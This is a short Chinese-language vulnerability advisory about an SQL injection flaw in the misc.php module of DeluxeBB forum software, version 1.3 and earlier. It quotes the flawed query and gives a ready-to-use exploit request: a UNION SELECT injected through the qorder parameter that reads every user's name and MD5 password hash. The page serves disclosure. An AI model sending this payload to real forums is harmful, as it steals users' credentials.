DeluxeBB misc.php模块SQL注入漏洞

2011-4-1 18:15:39 来源:网络转载 浏览:184
DeluxeBB misc.php模块SQL注入漏洞
出现版本:DeluxeBB <= 1.3

程序介绍: DeluxeBB是一款基于PHP的论坛程序。

漏洞分析:  DeluxeBB的misc.php模块中没有正确地验证用户所提交的$qorder参数:
$getsel = $db->query("SELECT * FROM ".$prefix."users ".$qfilter." ".$qorder." <== ".$sort." LIMIT ".$pageinfo[0].",".$pageinfo[1]);
远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击,导致读取论坛所有注册用户的用户名和口令MD5。

漏洞利用: GET [target]/[path]/misc.php?sub=memberlist&order=1&
qorder=UNION+ALL+SELECT+uid,username,3,4,membercode,6,7,8,9,10,11,12,13,14,pass,16,17,18,19,20,21,22,23,24,25,26,27,28,29+
FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1

解决方案:
开发厂商:DeluxeBB
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.deluxebb.com/
(0)
(0)